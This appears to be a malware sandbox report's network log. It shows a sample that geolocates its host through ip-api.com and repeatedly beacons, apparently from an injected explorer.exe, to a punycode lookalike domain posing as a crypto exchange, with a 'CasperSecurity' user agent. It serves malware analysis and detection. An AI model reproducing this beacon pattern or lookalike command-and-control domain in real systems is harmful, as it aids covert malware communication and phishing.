                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398552895 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 57
                                                                                                                                                                                                                                X-Rl: 42
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398642063 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 57
                                                                                                                                                                                                                                X-Rl: 42
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                62192.168.2.449835188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.509566069 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.515986919 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.207711935 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:14 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rSaR2qt7NuRN6sdQW%2Bd9d1Rda8IEaYdAAwXLcGDeFHGdYh2h3Ew%2BIpBKBXw1CK52veKn731r7RuepWQz0GIXrHhpfY1EkvyEDlQQEp2SEK%2BEiVHfeb%2FD4yGhXlwHuuHLXMqloVrxvV0K9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4006ec69435d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                63192.168.2.449836188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.320671082 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.325546026 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.050468922 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLc%2FneY9fyCK1hSFk0kcNbyhecpxBct7wtYCfMm26SQUaBIVMtr3Nm3%2FywQianLD11t93NabGMjcmIFB8NzaQRwZb69K1rFKadaKmHUbL2I5EcPr52%2FQpHNvsVT61d0T0QES7Sz7%2FWkQ%2Fe4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef400c19fe180d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                64192.168.2.449837208.95.112.1807244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.524842024 CEST39OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.996701956 CEST641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:14 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 55
                                                                                                                                                                                                                                X-Rl: 41
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                65192.168.2.449839188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.166063070 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.173758984 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980057001 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojS3rNO55m%2Fhf8C5AXymrnokRZh9eUeWIOrJGC63rhDc0KGFoJ9vCtho4wZ2WIBRmgPlXJaqXmI%2FllxZUsxQn8mAN6iKyENMrZprqisGFwmygQxXos07C3S5qf8bZgRN2yFydpmMjo0M1KM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40116aae7cf0-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                66192.168.2.449840188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.102128029 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.106971979 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.821794033 CEST629INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q02po0N75xyzjZt6NdX3RKMXyA9%2BFomNq9CMr1o0HopGatxHROmwh2X%2BvtMSoZfB8ESXRcfvFYn3zBfRoRxRAtQ%2Bdb%2F%2F%2FqCAvPphsp%2BN%2BNSo4bwwcAOf26GqxhcMphVmru%2Bx3MFWfofs6w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40173ad743eb-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                67192.168.2.449842188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.072931051 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.080514908 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.817667007 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:17 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5qeatmvx3v%2BTS%2FOdtUElCElSAUP2CAViHCRoR%2FdEQhrLlTQFEhwDbsjn9GCmtI8kwlvWe6lXDSZfmgi7A4ogUVyRzNWY3%2ByVJuUnim1mxCY%2FbdTDPP0emQZ7EltIasS4LWJiCiiaESRvl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef401d58617271-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                68192.168.2.449843188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.944094896 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.949173927 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.768424988 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QRz8309uvEX%2B7KGR4kl38SS83fZj8tLqSObwvQgUD7Yz%2B8E5BMZz%2BYc49vxYOvwnCC1rXMTheVUC4LmNL%2Flg1d4EIo9RrUgzH1GVRcIHX%2BtU99ys02MYhA2%2B1pnnuwzWoykK6qzBDsChhM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4022cb914213-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                69192.168.2.449845188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.885767937 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.890686035 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.600984097 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:19 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wutuPuuSOvGXmgmctOfu3MxAEzHUp4HMnQ6l6ZESWqzj7zf1g5bD%2BbwJPOxEWN6bNn%2Fip4PQRrNlQ8G5qFm7Og5EAXr%2B9XX3xpZl5GbQVq6rfyO4FbrtjeR%2FjjLvHbjVrEkbtghM9a0Kyg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40288f6c42db-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                70192.168.2.449846188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.823570013 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.828388929 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.561506987 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSo57SJoUBA9i%2FWJKoAwIHYYEWI65%2BYajWiN0RQX9Kr4R75%2F%2FtXBf8GwbaYZzYoxq1doGtchXX51S87xacIxWQwaT0ypyRrhYolWpovbN%2BsUjhSFpTfGY8UubB8glFXt922qmKDsZgHglXg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef402e6ac0c41d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                71192.168.2.449847188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.702090025 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.706885099 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.406790018 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg9967PBSrutY9d3T6aa8l9FeqVLmLyueFzAWxIZ%2FHyRDNsetFbtTXumKC9cF6skKwMio%2FxZS9BxS%2Fs0vrDGEmYkfqKq1gjZmEWmGwPbGGIMzp%2FYmafHvrXW4ADfQACiVoCMRK92WEAdAdw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4033eb8842a7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
